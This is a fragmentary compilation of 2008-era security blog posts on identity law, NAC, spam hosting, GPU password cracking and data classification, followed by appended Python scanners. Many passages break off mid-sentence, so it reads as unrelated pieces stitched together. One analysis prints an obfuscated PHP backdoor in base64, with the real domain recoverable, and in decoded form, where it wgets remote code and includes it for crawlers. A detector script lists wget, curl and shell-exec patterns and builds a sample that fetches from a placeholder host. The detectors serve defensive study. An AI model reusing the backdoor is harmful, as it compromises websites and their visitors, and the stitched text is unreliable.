If you would like to apply for your press credentials please contact me at by Monday. Please include your SBN member blog URL to verify your membership. I am submitting the final list to the SC Mag folks Monday evening.
to someone else, then they can do whatever they want with it. If data is property, then they can buy, sell, license or give away my identity without my consent. This puts me at risk because I must rely on the good will of a third party to keep my identity secure.
But if personal information really were property, then I should be able to permanently sell, or “alienate,” it. But unfortunately, I can’t sell personal information like a car. If I sell my car and the new owner paints it purple or runs it into a tree, it’s not my problem. But we all know that if I sell my personal information and the new owner “crashes” my identity, I suffer. Unlike all other forms of property, personal information is inherently inalienable. Unless you enter the witness protection program, you’re stuck with your identity no matter how many times you sell it and no matter how many times it is crashed.
Intellectual property law does not generally treat personal information as property. Most personal information, such as names, addresses, phone numbers and social security numbers, consists of facts. Facts are not copyrightable. You can’t patent personal information, and it certainly isn’t a trade secret. In short, nobody “owns” my name, including myself. And if someone could “own” my name, it would most logically be my parents, since they created it. But my mom can’t copyright my date of birth and the government can’t patent my social security number. My phone number is not an AT&T trade secret, nor is it mine.
like property, and so it is treated as such. Like property, personal information has value. Entire multi-billion dollar industries thrive on the sale and exchange of personal information. Next, like any form of property, personal information in databases can be shared, sold, licensed, stolen or lost with remarkable efficiency. And unfortunately, you don’t have any constitutional right of privacy when you give your personal data to a third party.
Some laws recognize that personal information has value. For example, United States election law requires candidates to disclose the value of all in-kind campaign donations, including databases of potential voters. Other federal and state statutes, such as the Gramm-Leach-Bliley Act and the Sarbanes-Oxley Act, require corporations to account for the fair market value of assets, which may include customer data. Even tort law says that some forms of privacy come from a trademark ownership of one’s name and likeness. And breach notification laws seem to assert that companies which collect personal information “own” it.
But that isn’t the whole story. Unlike every other form of property, you can’t alienate personal information (such as bank account numbers, credit scores, social security numbers or police reports) even if a third party creates it. Personal information is different from property, since property is presumptively alienable.
In the Information Age you are not much more than “an electronic collage of bits of information, a digital person composed in the collective computer networks of the world.” In other words, a person may now be defined as just a few pieces of data. This data is your
Your Data Self is a collection of your credit report, Facebook page, Google results, bank account numbers, archived e-mails and an endless parade of other data. Your Data Self is a digital alter-ego with its own personality, dispositions, fallacies and mortality. Your Data Self also has the power to enter contracts, grant access to your financial assets, have surgery, commit crimes or be kidnapped.
will. If someone makes your Data Self sign a contract, you are bound by it. If your Data Self is convicted of a crime, you can go to jail. If someone forces your Data Self to take out a loan, you must repay it. If your Data Self has an operation, you may no longer qualify for medical insurance. If your Data Self is abused, stolen, sold, manipulated or forced to act against its will, you suffer the consequences. In this sense, “Identity Theft” might be more descriptively defined as “Digital Kidnapping.” Identity Theft is when someone pretends to be you by “kidnapping” your Data Self, doing something bad, and you get blamed.
theories of personal information: first, you have an alter-ego digital “identity” or Data Self; and second, your Data Self is subject to theft and abuse like property.
Fortunately, the 13th Amendment ended slavery, and the human muscle once required for agriculture and labor does not command the same economic premium in a post-industrial society. Instead, a person’s economic value now lies in his access to financial assets and credit. Our Data Selves are easy to coerce, and we are now worth more in bytes than in flesh and blood. As long as Data Selves are digital property, new crimes similar to identity theft will continue to arise, and our society runs the sinister risk of a new form of human trafficking: a type of Digital Slavery where third parties can own, abuse and force Data Selves to act against their will.
499 U.S. 340, 363-64, 111 S. Ct. 1282, 1297 (1991) (holding that an alphabetized collection of personal facts in a phone book is not copyrightable because (1) facts are not copyrightable and (2) the phone book lacks minimally creative selection, coordination and arrangement. “As a statutory matter, 17 U.S.C. § 101 does not afford protection from copying to a collection of facts that are selected, coordinated and arranged in a way that utterly lacks originality.”). 35 U.S.C.A. §§ 101-102. Facts in a database may qualify for trade secret protection under state law, but only if the information meets stringent requirements and remains secret. 19 NO. 7
425 U.S. 435, 443-44 (1976) (holding that bank records have no Fourth Amendment protection and are subject to government subpoena with no infringement of an individual’s rights). 2 U.S.C.A. § 431(8)(a). “Tort” law is common law, or judge-made law, that allows people to sue others for doing bad things. For example, the tort of Appropriation of Name or Likeness is when someone uses a person’s name or picture for financial gain:
§ 652C cmt. a (1977) (The Tort of Appropriation of Likeness gives the individual “exclusive use of his own identity in so far as it is represented by his name or likeness and in so far as the use may be of benefit to him or to others. Although the protection of his personal feelings against mental distress is an important factor leading to a recognition of the rule, the right created by it is in the nature of a property right, for the exercise of which an exclusive license may be given to a third person, which will entitle the licensee to maintain an action to protect it.”).
I get so busy with work stuff, worrying about the economy, who will win an election, are we secure, that I sometimes forget what is really important. What is really important is spending time with my family and watching my two little babies grow up to be boys. I was reminded of that again tonight. A friend gave us tickets to the Florida Panthers hockey game. It was last minute, and the two boys and I ate dinner, jumped in the car and headed down to the Bank Atlantic Center.
The Panthers do a great job putting on a show for the kids. Though the arena is less than half full, they have all kinds of contests and other kid-related promotions and activities. My boys really enjoy going to Panther games.
I, on the other hand, really enjoy going to anything with my two sons. It never fails that they do and say things that make me realize how fast they are growing up and how lucky I am to have them. Tonight, when they sang the Star Spangled Banner, instead of having to tell them to stand, they both got right up. My youngest son, Bradley, took off his hat and held it over his heart. Watching this little 7-year-old standing there at attention with his hat over his heart, singing the words to the National Anthem, I was pretty close to tears.
After this, a commercial on the scoreboard talked about going to a local college and getting an education so that you "can go places". My 9-year-old son, Landon, looked at me and said, "Dad, that is what I want to do. I want to go to college so I can be like you and go places." I was so touched that he would want to be like me. I had to explain to him that going places was more than just actually going to different places, but that there was another meaning to it. I thought about it. I don't want him to have to go to different places, but I sure as heck hope that he does "go places". But the simple way he said this, which encompassed how he thinks about me, was enough to make me realize how blessed I am to have these two boys.
So remember, time marches on, and the little ones don't stay little forever. If you are lucky enough to have kids, cherish every day and moment you can spend with them. Before you know it they aren't little anymore.
The volume of junk e-mail sent worldwide dropped drastically today after a Web hosting firm identified by the computer security community as a major host of organizations allegedly engaged in spam activity was taken offline, according to security firms that monitor spam distribution online.
While its gleaming, state-of-the-art, 30-story office tower in downtown San Jose, Calif., hardly looks like the staging ground for what could be called a full-scale cyber crime offensive, security experts have found that a relatively small firm at that location is home to servers that serve as a gateway for a significant portion of the world’s junk e-mail.
The servers are operated by McColo Corp., which these experts say has emerged as a major U.S. hosting service for international firms and syndicates that are involved in everything from the remote management of millions of compromised computers to the sale of counterfeit pharmaceuticals and designer goods, fake security products and child pornography via e-mail.
But when two Internet providers cut off McColo’s connectivity to the Internet, security experts said. Immediately after McColo was unplugged, security companies charted a precipitous drop in spam volumes worldwide. E-mail security firm IronPort said spam levels fell by roughly 66 percent as of Tuesday evening.
I will do my best to both tweet (twitter id: catalyst) from CSI and report on interesting talks/findings from the floor. I will also be taking a limited number of vendor meetings to learn more about the products and solutions that make it easier for people to protect information. Shoot me a note if there is a product you want me to check out and report back on.
Sometimes when you try to explain something you can't help but muddy the waters. That is exactly what happened to he wrote about endpoint based NAC in Network World. Hey, I am not knocking Tim though. I get some of my best material from his column. Anyway, in this week's adventure Tim is seeking to compare the pros and cons of endpoint based NAC to other types of NAC technologies. He has the same old regular guest stars featured: Rob Whitley of Forrester, Ofir Arkin and a couple of special guest star NAC customers. I am not going to regurgitate Tim's entire article. Instead let's go to the
Tim, the "theoretical" problem of trusting an endpoint to report on itself is more real than that. Ask Richard Stiennon if you have any questions. In fact, this is a reason why some people choose not to go endpoint based NAC. However, that is not the major downside to endpoint based NAC. The major downside is that there is no guest access solution. What do you do if the endpoint does not have the agent installed and you can't make them install the agent? Saying that you then need a second type of NAC is not elegant, as Rob Whitley says. In fact, it is downright ugly. When you consider that guest or unmanaged access is the biggest driver in NAC, that pretty much sinks the endpoint based NAC approach.
Guys, if the only defense you have is IPS, that is fine, but let's not say that is an effective NAC solution for guests. You are bound by what the IPS can detect, and it usually takes a lot of IPS boxes. Not a scalable model at all. Of course you could wait for McAfee to resurrect the Lockdown appliances. It didn't work before and it probably won't work now.
Now wouldn't it be great if there was one NAC solution that covered all of these bases from one management console? You bet. If you are looking for one that does that let me know or check out StillSecure Safe Access!
Chris Hoff inspired this with ; a framework/standard for exchanging network security objects and events. Its roots are in NAC (Network Access Control) although as there’s been very little adoption to date.
Since cloud computing is a crappy marketing term that can mean pretty much whatever you want, I won’t dig into the various permutations here. For this post I’ll be focusing on distributed services (
Down the road we’ll dig into these in more detail, but any time we start distributing services and functionality over an open public network with no inherent security controls, we need to focus on the design issues and reduce design flaws as early as possible. We can’t just look at this as a network problem; our authentication, authorization, information and service (layer 7) controls are likely even more important.
In Tippett's view, that is a hypothesis, and a hypothesis needs to be tested to determine its validity. These tests can be performed either by analyzing data or by conducting a controlled experiment.
In many cases, Tippett claims, testing a hypothesis (we need more of product X) will show that the marginal benefits of deploying more (of the same) technology do not outweigh the marginal costs. For example, patching once a day instead of once a month might be much more expensive than the costs that are averted by it. If that hypothesis is proven to be true, patching once per month instead of once per day would be a colossal waste of resources. The costs would not outweigh the benefits.
In an ideal risk-assessment scenario, sufficient data is available to estimate such a risk (defined as likelihood ∙ impact) before a decision must be made, rather than in hindsight after a solution has been implemented.
Most organizations lack the body of experience to be able to compute these risks at all, or at least in a way that is statistically significant enough to be usable. Most organizations are unwilling (or unable) to design and execute an experiment and draw conclusions based on the outcome of those experiments.
Until sufficient reliable data becomes available (at reasonable costs) organizations will never be able to build their information security programs based on a formal risk management approach. When such data does become available (and it is starting to) the IT security landscape will change. Until then risk management will be predominantly something we talk about rather than practice.
Growing financial pressures, unforeseen threats and a volatile and rapidly changing business landscape — apt descriptions for both the world economy and this year's Worldwide Infrastructure Security Survey.
Arbor Networks once again has completed a survey of the largest ISPs and content providers around the world. Some 70 lead security engineers responded to 90 questions covering a spectrum of Internet backbone security threats and engineering challenges. This fourth annual survey covered the 12-month period from August 2007 through July 2008.
Do any of these ring a bell? The back alleys of Silicon Valley are littered with the corpses of that couldn't. Google has beaten most of these names into the annals of history. Only Yahoo and Microsoft (with their deep pockets) still put up some token resistance to the Borg-Google collective. Why? Do we like the Google color schemes? Do the double "0s" get us? Do we like the idea of advertiser-based searching? No, no and no. We use Google because, more than any other search engine out there, when we want to find something, Google finds it for us. The algorithms and intelligence Google uses result in what we are looking for. Forget Android, Google Apps, Google Maps and all of that other stuff; we use Google because their search renders the most relevant results.
Could there be a new player on the horizon that gives us more relevant results? Could there be a "riot" in the search arena? If you believe what the folks at say, there very well could be. In an age of social networking, this is a social search engine. OneRiot gives you search results not based upon how many links there are to that page. The results you get are based upon the popularity of those pages as measured by people on the net. This should result in links not to the Wikipedia page but to pages that real people look at when looking for a particular keyword. This could be the key to breaking out of the collective. To paraphrase what, I have seen the future of Internet search and its name is OneRiot.
Besides the search, OneRiot plays on its social media roots and has some really great. There are plug-ins for MySpace (why no Facebook, guys?), Twitter, web slices for IE8, etc. Check them out. Also you can make their searches better by.
OneRiot is based in Boulder, CO, and in full disclosure I have some friends who work there. But don't let that hold you back. Go check out OneRiot and see for yourself that there can be more to search than being another drone of the collective.
My brought to light an even more extreme example of the evolution of virtualization's mainstream adoption and focused on the implications that cloud computing brings to bear when addressing the PCI DSS.
I was disheartened to find that, upon inquiring as to the status of the formation of and participation in a virtualization-specific special interest group (SIG), the SSC's email response to me was as follows:
Hello Christofer,
Thank you for contacting the PCI Security Standards Council. At this time there is currently no Virtualization SIG. The current SIGs are Pre-Authorization and Wireless. Please let us know if you are interested in either of those groups.
Regards,
The PCI Security Standards Council
-----Original Message-----
From: Christofer Hoff [mailto:choff@packetfilter.com]
Sent: Wednesday, October 29, 2008 12:58 PM
To: PCI Participation
Subject: Participation in the PCI DSS Virtualization SIG?
How does one get involved in the PCI DSS Virtualization SIG?
Thanks,
Christofer Hoff
VMware, the global leader in virtualization solutions from the desktop to the datacenter, announced today that it is joining the PCI Security Standards Council. As a participating organization, VMware will work with the council to evolve the PCI Data Security Standard (DSS) and other payment card data protection standards. This will help those VMware customers in the retail industry who are required to meet these standards to remain compliant while leveraging VMware virtualization. VMware has also launched the an initiative to help educate merchants and auditors about how to achieve, maintain and demonstrate compliance in virtual environments to meet a number of industry standards, including the PCI DSS.
As a participating organization, VMware will now have access to the latest payment card security standards from the council, be able to provide feedback on the standards, and become part of a growing community that now includes more than 500 organizations. In an era of increasingly sophisticated attacks on systems, adhering to the PCI DSS represents a significant aspect of an entity's protection against data criminals. By joining as a participating organization, VMware is adding its voice to the process.
"The PCI Security Standards Council is committed to helping everyone involved in the payment chain protect consumer payment data," said Bob Russo, general manager of the PCI Security Standards Council. "By participating in the standards-setting process, VMware demonstrates it is playing an active part in this important end goal."
This is a case where IDS is your friend: you need to be watching for DNS traffic floods that will indicate you are under attack. There are also commercial DNS solutions you can use with active protections, but for some weird reason I hate the idea of paying for something that’s free, reliable and widely available.
Using the nVidia GT260 graphics card, the system could test roughly 10 thousand password hashes per second. A cheap quad-core CPU can only do about 1 thousand password hashes per second. This is not the 100-fold speed-up promised, but it is an impressive 10-fold speed-up. I tried out some other processors as well. Intel has shipped a new extremely-mobile processor (intended for cell-phones) called the "Atom". It has roughly a tenth the CPU power of the desktop processor. I tested the MacBook Air. Its graphics accelerator is actually slower than the built-in processor. Its 9400m GPU only does 178 hashes per second, but the Core 2 Duo could do around 400 hashes per second. Graphics cards work by having a lot of tiny/simple processors. Here is a breakdown of some typical processors: In theory, the speed of the cracking software should correlate with the frequency multiplied by the number of cores. The card to get right now is probably the 9800 GX2. I just ordered one from for $274. It puts two chips together on a single card, which should make it faster (as well as cheaper) than the GT260. I spent another $200 to get a system to go around it. Elcomsoft currently cannot handle different cards. Therefore, when running cracking software on a MacBook Pro (which has a 9400m and a 9600m), you won't be able to use both simultaneously.
Bartol - Framework for Software Assurance: Nadya’s presentation will provide an update on the Software Assurance Forum efforts to establish a comprehensive framework for software assurance (SwA) and security measurement. The Framework addresses measuring achievement of SwA goals and objectives within the context of individual projects, programs or enterprises. It targets a variety of audiences, including executives, developers, vendors, suppliers and buyers. The Framework leverages existing measurement methodologies, including Practical Software and System Measurement (PSM); CMMI Goal, Question, Indicator, Measure (GQ(I)M); NIST SP 800-55 Rev1; and ISO/IEC 27004, and identifies commonalities among the methodologies to help organizations integrate SwA measurement in their overall measurement efforts cost-effectively and as seamlessly as possible, rather than establish a standalone SwA measurement effort within an organization. The presentation will provide an update on the SwA Forum Measurement Working Group work, present the current version of the Framework and the underlying measures development and implementation processes, and propose example SwA measures applicable to a variety of SwA stakeholders. The presentation will also update the group on the latest NIST and ISO standards on information security measurement that are being integrated into the Framework as the standards are being developed.
Hope - The Web Security Testing Cookbook: The Web Security Testing Cookbook (O’Reilly & Associates, October 2008) gives developers and testers the tools they need to make security testing a regular part of their development lifecycle. Its recipe-style approach covers manual exploratory testing as well as automated techniques that you can make part of your unit tests or regression cycle. The recipes cover the basics, like observing messages between clients and servers, to multi-phase tests that script the login and execution of web application features. This book complements many of the security texts in the market that tell you what a vulnerability is but not how to systematically test it day in and day out. Leverage the recipes in this book to add significant security coverage to your testing without adding significant time and cost to your effort.
Many security experts believe that employee usernames and passwords are passé and on the way out. Is that true? If so, what is the alternative? This session discusses the different aspects of using strong authentication for internal users to systems and applications. It examines the technologies available, the benefits/challenges of deploying these technologies, where it’s been successful, where it hasn’t, the barriers to deployment and what we can do about it. The following topics will be covered: the options for strong authentication technologies for the enterprise; pros/cons of the technologies and why; challenges to deployment; practical examples of deployment; tactics and discussion points with the vendors; and a framework for managing strong authentication for internal users over the entire enterprise.
In my previous post titled "" I described the need for a new security model methodology and set of technologies in the virtualized and cloud computing realms built to deal with the dynamic and distributed nature of evolving computing:
This basically means that we should distribute the sampling, detection and prevention functions across the entire networked ecosystem, not just to dedicated security appliances; each of the end nodes should communicate using a standard signaling and telemetry protocol so that common threat, vulnerability and effective disposition can be communicated up and downstream to one another and to one or more management facilities.
Greg Ness from Infoblox reminded me in the comments of that post of something I was very excited about when it became news at InterOp this last April: the. IF-MAP is a standardized, real-time publish/subscribe/search mechanism which utilizes a client/server, XML-based SOAP protocol to provide information about network security objects and events, including their state and activity:
IF-MAP extends the TNC architecture to support standardized, dynamic data interchange among a wide variety of networking and security components, enabling customers to implement multi-vendor systems that provide coordinated defense-in-depth. Today's security systems – such as firewalls, intrusion detection and prevention systems, endpoint security systems, data leak protection systems, etc. – operate as "silos" with little or no ability to "see" what other systems are seeing or to share their understanding of network and device behavior.
This limits their ability to support coordinated defense-in-depth. In addition, current NAC solutions are focused mainly on controlling network access and lack the ability to respond in real time to post-admission changes in security posture or to provide visibility and access control enforcement for unmanaged endpoints. By extending TNC with IF-MAP, the TCG is providing a standards-based means to address these issues and thereby enable more powerful, flexible, open network security systems.
I'm really interested in how many vendors outside of the NAC space are including IF-MAP in their roadmaps. While IF-MAP has potential in conventional, non-virtualized infrastructure, I see a tremendous need for it in our move to with virtualization and Cloud Computing. Integrating, for example, IF-MAP with VM-introspection capabilities (in VMsafe, XenAccess, etc.) would be fantastic, as you could tie the control planes of the hypervisors, management infrastructure and provisioning/governance engines with that of security and compliance in near-time.
A recent analysis of a compromised web site by eSoft's Threat Prevention Team led to the discovery of hidden links designed only to show up when viewed by web crawlers such as those used by Google, Microsoft and Yahoo. The website reviewed, dancescape tv, appears perfectly normal when viewed from standard browsers, but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler. The PHP code in question looks like this:
eval(base64_decode("aWYgKChlcmVnaSgiYm90IiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgidXJwIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgibXNuIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkpIHsgc3lzdGVtKCJ3Z2V0IC1PIC90bXAvZ2V0aW5jbC50eHQgaHR0cDovL3B1YmxpY3NudWRlLmNvbS90ZW1wL2luY2wudHh0Iik7aW5jbHVkZSgiL3RtcC9nZXRpbmNsLnR4dCIpOyB9"));
Decoded, the payload is a user-agent check that fetches and includes remote code only when a search-engine crawler is visiting:
if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) { system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt"); include("/tmp/getincl.txt"); }
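As an added example (not from eSoft's analysis or the original post), here is a small Python scanner for the injection pattern above: it finds eval(base64_decode("...")) calls in PHP source, decodes the blob, and flags the behaviours seen in this case (branching on HTTP_USER_AGENT, fetching a remote file, shelling out, and including a file from /tmp). The sample PHP file, its payload and the example.invalid domain are constructed placeholders.

```python
import base64
import binascii
import os
import re

# The obfuscation wrapper seen on the compromised site: eval(base64_decode("...")).
EVAL_B64_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)', re.S)

# Behaviours that mark a decoded payload as a crawler-cloaking backdoor rather than
# harmless obfuscation; each one is present in the decoded snippet discussed above.
INDICATORS = {
    "ua_cloaking": re.compile(r"HTTP_USER_AGENT", re.I),       # branches on the visitor's UA
    "remote_fetch": re.compile(r"\b(?:wget|curl)\b", re.I),    # pulls content from elsewhere
    "shell_exec": re.compile(r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(", re.I),
    "runtime_include": re.compile(r"\b(?:include|require)(?:_once)?\s*\(\s*[\"']/tmp/", re.I),
}


def decode_payloads(php_source):
    """Return the decoded text of every eval(base64_decode(...)) in php_source.

    Undecodable blobs are returned as None: they are still worth a look."""
    decoded = []
    for match in EVAL_B64_RE.finditer(php_source):
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            decoded.append(None)
    return decoded


def classify(payload):
    """Names of the indicator patterns matched by one decoded payload (sorted)."""
    if payload is None:
        return ["undecodable"]
    return sorted(name for name, rx in INDICATORS.items() if rx.search(payload))


def scan_source(php_source):
    """One finding per obfuscated eval: the decoded text plus its indicator names."""
    return [{"decoded": p, "indicators": classify(p)} for p in decode_payloads(php_source)]


def scan_tree(root):
    """Walk a document root and return {path: findings} for PHP files with obfuscated evals."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".inc", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                findings = scan_source(fh.read())
            if findings:
                results[path] = findings
    return results


# Constructed sample modelled on the injected snippet above. The domain is a
# placeholder (example.invalid), not the one from the real incident.
SAMPLE_PAYLOAD = (
    'if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"])))'
    ' { system("wget -O /tmp/getincl.txt http://example.invalid/temp/incl.txt");'
    'include("/tmp/getincl.txt"); }'
)
SAMPLE_PHP = (
    "<?php\n"
    "// legitimate site code would be here\n"
    'eval(base64_decode("' + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + '"));\n'
)

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_PHP):
        print("indicators:", ", ".join(finding["indicators"]))
        print("decoded:   ", finding["decoded"])
```

Point scan_tree at a web root to triage every PHP file; a finding with all four indicators is the same shape as the one on the compromised site.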
Recently a friend passed along a tip from a dermatologist: stop sipping through straws. The doctor said it was the number one cause of wrinkles. Even more recently, at lunch one day, my aunt relayed some info from her husband, an orthodontist. He said that drinking through a straw prevents cavities and tooth decay, since straws allow sugary beverages to bypass your teeth. When my aunt said this, everybody around the table (six women) stuck straws in their drinks. But when I countered with the skincare side of the question, my aunt was the first to pluck her straw right back out again.
It has been an interesting two weeks – thanks to a catastrophic failure on the bulk of my web servers – thanks to an unannounced Dreamhost switch/migration that resulted in their setting all permissions incorrectly. It's a long and boring story – loaded with insights for anyone involved in technology and customer service. But we're fixed – and I'm back.
The last few weeks have been pretty amazing; we have traveled the country from Upstate NY to Kansas City… Seattle… and then back "East" to Detroit. We leave here on Thursday and head to Ohio for two days before heading on to the DC Metro area. CompTIA is sponsoring a book signing and give-away at the CSI show – so look for more details.
Last week – before the blizzards closed down sections of I-90 — we stopped on Monday at Mount Rushmore – and the entire family was taken with the effort on multiple levels. I was drawn to the history of the presidents – and will be spending more time learning about the character of these men and the way they served themselves and their country. All very inspiring!!
(2) Create a community where anyone with an idea can share their approach in the pursuit of helping another. If today is your first day in security welcome - share what you have learned without fear.
As we set out to journey the country keep tabs on our schedule and opportunities to meet at or follow the progress of the book and speaking tour at. As always if you are on the way (or in the city we are heading) please contact me directly so we can meet. Our RV is our home and our home is always open to our friends.
I am also spending more time on twitter these days - and would love to engage in the conversation with you. You can learn more about twitter here: and "follow" and chat with me here:
I was reading the while stuck at the airport for several hours last Thursday. During my many hours of free time, I overheard some IT executive discussing the difficulties of implementing data discovery and classification with his peers. I did not catch the name of the company, and probably would not pass it along even if I had, but the tired and whiny rant about their associated failures was not unique. Perhaps I was a bit testy about having to sit in an airport lobby for eight hours, but all I could think was “What is wrong with you? If hackers can navigate your data center, why can’t you?”
That’s where the RSA report just gelled my thoughts on the subject. If a small group, quite literally a handful of hackers, can use Torpig & BlaBla to steal hundreds of thousands of credit card numbers, steal accounts and passwords, install malicious software at multiple company sites … all without being provided credentials, access rights or a specific map of your IT infrastructure … why can’t your company classify its own data and intellectual property assets? You would think that a company, given a modest amount of resources, could discover, classify and categorize its own data. I mean, if you paid someone full time to do it, don’t you think you could get the job done?
“Data in motion made it difficult to track”: So what? The hacker tools are kept running and they never stopped scanning. Nor did they give up on the first try; rather, they periodically modified their code to adapt for location and type of data, and they were persistent. You should be too.
“Difficulty to classify the data” and “Can’t find stuff you know is there”: So what? Hire better programmers. Pressure vendors for better tools. Can’t afford expensive software? There is open source code out there to start with; hackers can do it, so can you. There are at least a dozen programmatic ways to analyze data through content or even context, and probably even more ways to traverse/crawl/inspect systems. If the application your company uses can find it, so can you.
“Size of the project is difficult to manage”: So what? Divide and conquer. Take a specific set of data you are worried about and start there. Compliance group breathing down your neck to meet XYZ regulation? Pick one category (customer accounts, credit card data, source code, whatever), tune your tools and policies (you didn’t really think you were going to get perfection out of the box, did you?), address that problem and move on. If you are starting with an ISACA or COBIT framework and trying to map a comprehensive strategy, stop making the problem more complex than it is. Hackers went for low-hanging fruit; you should too.
“The results are not accurate”: So what? You’re not going to be 100% right all the time. The hackers aren’t either. Either accept 95-99% accuracy or try something different. Or maybe your policy is out of line with reality and needs to be reconsidered.
“Expensive” and “Takes too much in the way of resources”: No chance! If hackers can run malware for 18 months at TJX and related stores UNDETECTED, then the methods used are not resource hogs, nor did they invest that much money in the tools.
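As an added example (not from the original post or any product it mentions) of the "pick one category and start there" approach: a Python scanner that walks a directory for one data class, payment card numbers, using a loose digit-run pattern plus the Luhn check to cut false positives, and a per-file hit threshold as the tunable policy knob. The sample documents and the test card numbers in them are constructed.

```python
import os
import re

# Runs of 13-19 digits, optionally separated by single spaces or dashes, not
# embedded in a longer digit string. Deliberately loose; the Luhn check does the filtering.
CARD_CANDIDATE_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Constructed sample "files": one with two well-known test card numbers, one with a
# 16-digit reference number that fails Luhn, one with a phone number.
SAMPLE_DOCS = {
    "orders.csv": "id,card,amount\n1,4111 1111 1111 1111,19.99\n2,4242-4242-4242-4242,5.00\n",
    "notes.txt": "ticket 1234567890123456 is a reference number, not a card\n",
    "phone.txt": "call 5551234567 for support\n",
}


def luhn_ok(digits):
    """Luhn mod-10 check: true for a syntactically valid payment card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text):
    """Return the digit strings in text that look like card numbers and pass Luhn."""
    hits = []
    for match in CARD_CANDIDATE_RE.finditer(text):
        digits = re.sub(r"[ -]", "", match.group(0))
        # Skip single-repeated-digit runs (e.g. all zeros), which pass Luhn but are noise.
        if 13 <= len(digits) <= 19 and len(set(digits)) > 1 and luhn_ok(digits):
            hits.append(digits)
    return hits


def scan_docs(docs, min_hits=1):
    """docs: {name: text}. Returns {name: hit_count} for names with at least min_hits.

    min_hits is the policy knob: raise it to surface bulk stores first and
    ignore the odd number in a log line."""
    report = {}
    for name, text in docs.items():
        count = len(find_card_numbers(text))
        if count >= min_hits:
            report[name] = count
    return report


def scan_tree(root, min_hits=1, max_bytes=50 * 1024 * 1024,
              extensions=(".txt", ".csv", ".log", ".sql", ".xml", ".json")):
    """Walk root and scan text-like files under max_bytes; returns {path: hit_count}."""
    docs = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not name.lower().endswith(extensions) or os.path.getsize(path) > max_bytes:
                continue
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                docs[path] = fh.read()
    return scan_docs(docs, min_hits)


if __name__ == "__main__":
    for name, count in scan_docs(SAMPLE_DOCS).items():
        print(f"{name}: {count} card number(s)")
```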